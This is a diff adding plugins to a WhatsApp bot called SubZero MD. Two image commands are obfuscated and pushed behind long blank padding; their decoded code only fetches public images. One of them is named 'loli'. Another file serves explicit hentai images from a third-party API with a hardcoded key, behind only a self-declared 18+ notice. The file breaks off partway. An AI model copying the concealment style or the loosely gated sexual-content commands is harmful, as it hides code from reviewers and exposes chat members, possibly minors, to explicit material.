200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
function _0x50c1(){const _0x420824=['message','єяяσя\x20ƒєт¢нιηg\x20∂σg\x20ιмαgє:\x20','../command','>\x20©\x20Generated\x20By\x20SubZero','data','log','810kQnirQ','Hello\x20World!','https://dog.ceo/api/breeds/image/random','2637EZWILw','6902934kqAPhq','sendMessage','8155aRvqwL','dog','5800077dhjYhA','17092BwXTco','3596220hhuxvx','22255490wCQbfL','8720blaLpF','get','1114vmwbyk'];_0x50c1=function(){return _0x420824;};return _0x50c1();}const _0x378f8a=_0x2020;(function(_0x4ad2d3,_0x9b8c71){const _0x28907b=_0x2020,_0x1daab9=_0x4ad2d3();while(!![]){try{const _0x524da1=-parseInt(_0x28907b(0x103))/0x1*(parseInt(_0x28907b(0x10e))/0x2)+parseInt(_0x28907b(0x10a))/0x3+parseInt(_0x28907b(0x109))/0x4*(parseInt(_0x28907b(0x100))/0x5)+-parseInt(_0x28907b(0x104))/0x6+parseInt(_0x28907b(0x106))/0x7*(-parseInt(_0x28907b(0x10c))/0x8)+parseInt(_0x28907b(0x108))/0x9+parseInt(_0x28907b(0x10b))/0xa;if(_0x524da1===_0x9b8c71)break;else _0x1daab9['push'](_0x1daab9['shift']());}catch(_0x540615){_0x1daab9['push'](_0x1daab9['shift']());}}}(_0x50c1,0xd4d8c));function hi(){const _0x371c98=_0x2020;console['log'](_0x371c98(0x101));}function _0x2020(_0x10a4de,_0x7c040d){const _0x50c13c=_0x50c1();return _0x2020=function(_0x20201f,_0x325ffa){_0x20201f=_0x20201f-0xfb;let _0x371cc5=_0x50c13c[_0x20201f];return _0x371cc5;},_0x2020(_0x10a4de,_0x7c040d);}hi();const axios=require('axios'),{cmd,commands}=require(_0x378f8a(0xfc));cmd({'pattern':_0x378f8a(0x107),'desc':'Fetch\x20a\x20random\x20dog\x20image.','category':'fun','react':'🐶','filename':__filename},async(_0x362fd4,_0xc7457,_0x56364d,{from:_0x5cc14c,quoted:_0x253698,body:_0x1fa47d,isCmd:_0x533faa,command:_0x2d79df,args:_0x423c90,q:_0x5453f7,isGroup:_0x243155,sender:_0x4b35cf,senderNumber:_0x37a44c,botNumber2:_0x397da8,botNumber:_0xa5ea12,pushname:_0x17ea97,isMe:_0x5836bb,isOwner:_0x327855,groupMetadata:_0xbd80b2,groupName:_0x28cfac,participants:_0x51ff5a,groupAdmins:_0x1f2372,isBotAdmins:_0x528897,isAdmins:_0x323d8e,reply:_0x1f36a8})=>{const _0x343585=_0x378f8a;try{const _0x481a10=_0x343585(0x102),_0x524a4e=await axios[_0x343585(0x10d)](_0x481a10),_0x2fcba2=_0x524a4e[_0x343585(0xfe)];await _0x362fd4[_0x343585(0x105)](_0x5cc14c,{'image':{'url':_0x2fcba2['message']},'caption':_0x343585(0xfd)},{'quoted':_0xc7457});}catch(_0x9789de){console[_0x343585(0xff)](_0x9789de),_0x1f36a8(_0x343585(0xfb)+_0x9789de[_0x343585(0x10f)]);}});
|
plugins/fun-loli.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x51979e=_0xe898;function _0xe898(_0x52a261,_0xa3f819){const _0x19223f=_0x1922();return _0xe898=function(_0xe898bf,_0x42b912){_0xe898bf=_0xe898bf-0x194;let _0x1006d6=_0x19223f[_0xe898bf];return _0x1006d6;},_0xe898(_0x52a261,_0xa3f819);}(function(_0x2bca81,_0xbeb5a0){const _0x52fa81=_0xe898,_0x1f35a2=_0x2bca81();while(!![]){try{const _0x249a65=parseInt(_0x52fa81(0x197))/0x1*(parseInt(_0x52fa81(0x1a6))/0x2)+-parseInt(_0x52fa81(0x19c))/0x3+-parseInt(_0x52fa81(0x1a2))/0x4+parseInt(_0x52fa81(0x199))/0x5*(-parseInt(_0x52fa81(0x19e))/0x6)+parseInt(_0x52fa81(0x1a7))/0x7+-parseInt(_0x52fa81(0x19d))/0x8+parseInt(_0x52fa81(0x1a0))/0x9*(parseInt(_0x52fa81(0x1a4))/0xa);if(_0x249a65===_0xbeb5a0)break;else _0x1f35a2['push'](_0x1f35a2['shift']());}catch(_0x5e7e88){_0x1f35a2['push'](_0x1f35a2['shift']());}}}(_0x1922,0x8efaf));function hi(){const _0x154a92=_0xe898;console[_0x154a92(0x196)]('Hello\x20World!');}function _0x1922(){const _0x36c704=['1784936onTTnG','180UkjFyT','👸\x20*SUBZERO\x20MD\x20RANDOM\x20ANIME\x20GIRL\x20IMAGES*\x20👸\x0a\x0a\x0a\x20*🧬\x20©\x20SubZero\x20MD\x20BY\x20Mr\x20Frank\x20OFC*','20560941ldwVvV','fun','3929420Pbuaxn','axios','10jhGVCY','lolii','633874ZtPuXl','496860zZcfOg','sendMessage','*Error\x20Fetching\x20Anime\x20Girl\x20image*:\x20','loli','data','url','log','1yJVvBz','get','74990RsNksy','message','https://api.waifu.pics/sfw/waifu','1294221HLLeBU'];_0x1922=function(){return _0x36c704;};return _0x1922();}hi();const axios=require(_0x51979e(0x1a3)),{cmd,commands}=require('../command');cmd({'pattern':_0x51979e(0x1aa),'alias':[_0x51979e(0x1a5)],'desc':'Fetch\x20a\x20random\x20anime\x20girl\x20image.','category':_0x51979e(0x1a1),'react':'🐱','filename':__filename},async(_0x59d540,_0x3c1983,_0x5cc46d,{from:_0x15fe9c,quoted:_0x5006bd,body:_0x3b3b46,isCmd:_0x3832a5,command:_0x45db8c,args:_0x1bf564,q:_0x9f959a,isGroup:_0x2cc286,sender:_0x38458f,senderNumber:_0x3b69b8,botNumber2:_0xa81af2,botNumber:_0x107e87,pushname:_0x47e04a,isMe:_0x315d92,isOwner:_0x530f8a,groupMetadata:_0x45f57d,groupName:_0x1b5ffd,participants:_0x2b67e0,groupAdmins:_0x1338e7,isBotAdmins:_0x154cf5,isAdmins:_0x3b198b,reply:_0x3aee30})=>{const _0x3b21f1=_0x51979e;try{const _0x27b603=_0x3b21f1(0x19b),_0x130737=await axios[_0x3b21f1(0x198)](_0x27b603),_0x3251d7=_0x130737[_0x3b21f1(0x194)];await _0x59d540[_0x3b21f1(0x1a8)](_0x15fe9c,{'image':{'url':_0x3251d7[_0x3b21f1(0x195)]},'caption':_0x3b21f1(0x19f)},{'quoted':_0x3c1983});}catch(_0x36f8c1){console[_0x3b21f1(0x196)](_0x36f8c1),_0x3aee30(_0x3b21f1(0x1a9)+_0x36f8c1[_0x3b21f1(0x19a)]);}});
|
plugins/fun-nsfw.js
ADDED
@@ -0,0 +1,406 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
Credits To - Github: Kgtech-cmr
|
3 |
+
|
4 |
+
|
5 |
+
$$$$$$\ $$\
|
6 |
+
$$ __$$\ $$ |
|
7 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
8 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
9 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
10 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
11 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
12 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
13 |
+
|
14 |
+
Project Name : SubZero MD
|
15 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
16 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
17 |
+
Support : wa.me/18062212660
|
18 |
+
*/
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
const { cmd } = require('../command'); // Assurez-vous que cmd est bien défini dans votre projet
|
26 |
+
const axios = require('axios');
|
27 |
+
|
28 |
+
cmd({
|
29 |
+
pattern: "nsfw", // Nom de la commande
|
30 |
+
desc: "Display a list of NSFW options",
|
31 |
+
category: "fun",
|
32 |
+
use: '.nsfw',
|
33 |
+
react: "🔥", // Réaction ajoutée
|
34 |
+
filename: __filename
|
35 |
+
},
|
36 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
37 |
+
try {
|
38 |
+
// Liste des options NSFW
|
39 |
+
const nsfwList = `
|
40 |
+
*❦ \`SUBZERO SEXY HUB.🎀🍭\`*
|
41 |
+
|
42 |
+
1️⃣ *EJACULATION💦*
|
43 |
+
2️⃣ *PENIS🍆*
|
44 |
+
3️⃣ *EREC🌭*
|
45 |
+
4️⃣ *NUDE🍜*
|
46 |
+
5️⃣ *SEX🫦*
|
47 |
+
6️⃣ *CUTE🩷*
|
48 |
+
7️⃣ *ORGASM🌊*
|
49 |
+
8️⃣ *ANAL🕳️*
|
50 |
+
9️⃣ *SUSPENSION🍑*
|
51 |
+
1️⃣0️⃣ *KISS💋*
|
52 |
+
|
53 |
+
────────────────
|
54 |
+
*_Simply type the number corresponding to the option you'd like to choose._*
|
55 |
+
────────────────
|
56 |
+
⚠️\`[NOTICE]\`
|
57 |
+
*By Continueing You Agree that you are 18+ .*`;
|
58 |
+
|
59 |
+
// URL image for NSFW
|
60 |
+
const imageUrl = 'https://i.ibb.co/j8hv83f/Manul-Ofc-X.jpg';
|
61 |
+
|
62 |
+
// Envoi de la liste avec l'image et la légende
|
63 |
+
await conn.sendMessage(from, {
|
64 |
+
text: nsfwList,
|
65 |
+
caption: 'Choose one from the list above!',
|
66 |
+
image: { url: imageUrl }
|
67 |
+
}, { quoted: mek });
|
68 |
+
} catch (e) {
|
69 |
+
console.error(e);
|
70 |
+
reply('❌ An error occurred while processing your request.');
|
71 |
+
}
|
72 |
+
});
|
73 |
+
cmd({
|
74 |
+
pattern: "ejaculation", // Nom de la commande
|
75 |
+
desc: "Fetch a NSFW image related to the command",
|
76 |
+
category: "fun",
|
77 |
+
use: '.ejaculation',
|
78 |
+
react: "🔥",
|
79 |
+
filename: __filename
|
80 |
+
},
|
81 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
82 |
+
try {
|
83 |
+
// URL de l'API
|
84 |
+
const apiURL = `https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=ejaculation`;
|
85 |
+
|
86 |
+
// Récupérer l'image via l'API
|
87 |
+
const response = await axios.get(apiURL);
|
88 |
+
|
89 |
+
if (response.data && response.data.image_url) {
|
90 |
+
const imageUrl = response.data.image_url;
|
91 |
+
|
92 |
+
// Envoi de l'image avec le caption
|
93 |
+
await conn.sendMessage(from, {
|
94 |
+
image: { url: imageUrl },
|
95 |
+
caption: `Here your ${command} image 🔞🍆🍑.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🍑🔞.`,
|
96 |
+
}, { quoted: mek });
|
97 |
+
} else {
|
98 |
+
await reply('❌ No image found for this category.');
|
99 |
+
}
|
100 |
+
} catch (e) {
|
101 |
+
console.error(e);
|
102 |
+
await reply('❌ An error occurred while fetching the image.');
|
103 |
+
}
|
104 |
+
});
|
105 |
+
cmd({
|
106 |
+
pattern: "penis", // Nom de la commande
|
107 |
+
desc: "Fetch a NSFW image related to the command",
|
108 |
+
category: "fun",
|
109 |
+
use: '.penis',
|
110 |
+
react: "🍑",
|
111 |
+
filename: __filename
|
112 |
+
},
|
113 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
114 |
+
try {
|
115 |
+
// URL de l'API
|
116 |
+
const apiURL = `https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=penis_under_skirt`;
|
117 |
+
|
118 |
+
// Récupérer l'image via l'API
|
119 |
+
const response = await axios.get(apiURL);
|
120 |
+
|
121 |
+
if (response.data && response.data.image_url) {
|
122 |
+
const imageUrl = response.data.image_url;
|
123 |
+
|
124 |
+
// Envoi de l'image avec le caption
|
125 |
+
await conn.sendMessage(from, {
|
126 |
+
image: { url: imageUrl },
|
127 |
+
caption: `Here your ${command} image 🔞🍆🍑.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🍑🔞.`,
|
128 |
+
}, { quoted: mek });
|
129 |
+
} else {
|
130 |
+
await reply('❌ No image found for this category.');
|
131 |
+
}
|
132 |
+
} catch (e) {
|
133 |
+
console.error(e);
|
134 |
+
await reply('❌ An error occurred while fetching the image.');
|
135 |
+
}
|
136 |
+
});
|
137 |
+
cmd({
|
138 |
+
pattern: "erec", // Nom de la commande
|
139 |
+
desc: "Fetch a NSFW image related to the command",
|
140 |
+
category: "fun",
|
141 |
+
use: '.erec',
|
142 |
+
react: "🍑",
|
143 |
+
filename: __filename
|
144 |
+
},
|
145 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
146 |
+
try {
|
147 |
+
// URL de l'API
|
148 |
+
const apiURL = `https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=erect_nipple`;
|
149 |
+
|
150 |
+
// Récupérer l'image via l'API
|
151 |
+
const response = await axios.get(apiURL);
|
152 |
+
|
153 |
+
if (response.data && response.data.image_url) {
|
154 |
+
const imageUrl = response.data.image_url;
|
155 |
+
|
156 |
+
// Envoi de l'image avec le caption
|
157 |
+
await conn.sendMessage(from, {
|
158 |
+
image: { url: imageUrl },
|
159 |
+
caption: `Here your ${command} image 🔞🍆🍑.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🍑🔞.`,
|
160 |
+
}, { quoted: mek });
|
161 |
+
} else {
|
162 |
+
await reply('❌ No image found for this category.');
|
163 |
+
}
|
164 |
+
} catch (e) {
|
165 |
+
console.error(e);
|
166 |
+
await reply('❌ An error occurred while fetching the image.');
|
167 |
+
}
|
168 |
+
});
|
169 |
+
cmd({
|
170 |
+
pattern: "nude", // Nom de la commande
|
171 |
+
desc: "Display a nude NSFW image",
|
172 |
+
category: "fun",
|
173 |
+
use: '.nude',
|
174 |
+
react: "🔥", // Réaction ajoutée
|
175 |
+
filename: __filename
|
176 |
+
},
|
177 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
178 |
+
try {
|
179 |
+
// URL de l'API pour obtenir l'image de la catégorie "nude"
|
180 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=nude';
|
181 |
+
|
182 |
+
// Faire une requête à l'API
|
183 |
+
const response = await fetch(apiUrl);
|
184 |
+
const data = await response.json();
|
185 |
+
|
186 |
+
// Vérification des données reçues
|
187 |
+
if (data && data.image) {
|
188 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
189 |
+
|
190 |
+
// Envoi de l'image dans le chat
|
191 |
+
await conn.sendMessage(from, {
|
192 |
+
image: { url: imageUrl },
|
193 |
+
caption: 'Here is your nude NSFW image 🔞🔥.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🔥🔞.'
|
194 |
+
}, { quoted: mek });
|
195 |
+
} else {
|
196 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
197 |
+
}
|
198 |
+
} catch (e) {
|
199 |
+
console.error(e);
|
200 |
+
await reply('❌ An error occurred while processing your request.');
|
201 |
+
}
|
202 |
+
});
|
203 |
+
cmd({
|
204 |
+
pattern: "sex", // Nom de la commande
|
205 |
+
desc: "Display a NSFW sex image",
|
206 |
+
category: "fun",
|
207 |
+
use: '.sex',
|
208 |
+
react: "🔥", // Réaction ajoutée
|
209 |
+
filename: __filename
|
210 |
+
},
|
211 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
212 |
+
try {
|
213 |
+
// URL de l'API pour obtenir l'image de la catégorie "sex"
|
214 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=sex';
|
215 |
+
|
216 |
+
// Faire une requête à l'API
|
217 |
+
const response = await fetch(apiUrl);
|
218 |
+
const data = await response.json();
|
219 |
+
|
220 |
+
// Vérification des données reçues
|
221 |
+
if (data && data.image) {
|
222 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
223 |
+
|
224 |
+
// Envoi de l'image dans le chat
|
225 |
+
await conn.sendMessage(from, {
|
226 |
+
image: { url: imageUrl },
|
227 |
+
caption: 'Here is your sex NSFW image 🔞🔥.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋🔥🔞.'
|
228 |
+
}, { quoted: mek });
|
229 |
+
} else {
|
230 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
231 |
+
}
|
232 |
+
} catch (e) {
|
233 |
+
console.error(e);
|
234 |
+
await reply('❌ An error occurred while processing your request.');
|
235 |
+
}
|
236 |
+
});
|
237 |
+
cmd({
|
238 |
+
pattern: "cute", // Nom de la commande
|
239 |
+
desc: "Display a NSFW cute image",
|
240 |
+
category: "fun",
|
241 |
+
use: '.cute',
|
242 |
+
react: "🌸", // Réaction ajoutée
|
243 |
+
filename: __filename
|
244 |
+
},
|
245 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
246 |
+
try {
|
247 |
+
// URL de l'API pour obtenir l'image de la catégorie "cute"
|
248 |
+
const apiUrl = 'https://pikabotzapi.vercel.app/anime-nsfw/hentai-images/?apikey=anya-md&category=cute';
|
249 |
+
|
250 |
+
// Faire une requête �� l'API
|
251 |
+
const response = await fetch(apiUrl);
|
252 |
+
const data = await response.json();
|
253 |
+
|
254 |
+
// Vérification des données reçues
|
255 |
+
if (data && data.image) {
|
256 |
+
const imageUrl = data.image; // URL de l'image reçue depuis l'API
|
257 |
+
|
258 |
+
// Envoi de l'image dans le chat
|
259 |
+
await conn.sendMessage(from, {
|
260 |
+
image: { url: imageUrl },
|
261 |
+
caption: 'Here is your cute NSFW image 🔞💖.\n> © Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Nᴀsᴛʏ SᴜʙZᴇʀᴏ😋💖🔞.'
|
262 |
+
}, { quoted: mek });
|
263 |
+
} else {
|
264 |
+
reply('❌ Unable to fetch image. Please try again later.');
|
265 |
+
}
|
266 |
+
} catch (e) {
|
267 |
+
console.error(e);
|
268 |
+
await reply('❌ An error occurred while processing your request.');
|
269 |
+
}
|
270 |
+
});
|
271 |
+
cmd({
|
272 |
+
pattern: "orgasm", // Nom de la commande
|
273 |
+
desc: "Display a NSFW orgasm image",
|
274 |
+
category: "fun",
|
275 |
+
use: '.orgasm',
|
276 |
+
react: "💥", // Réaction ajoutée
|
277 |
+
filename: __filename
|
278 |
+
},
|
279 |
+
async (conn, mek, m, { from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
280 |
+
try {
|
281 |
+
// URL de l'API pour obtenir l'image de la catégorie "orgasm"
|
282 |
+
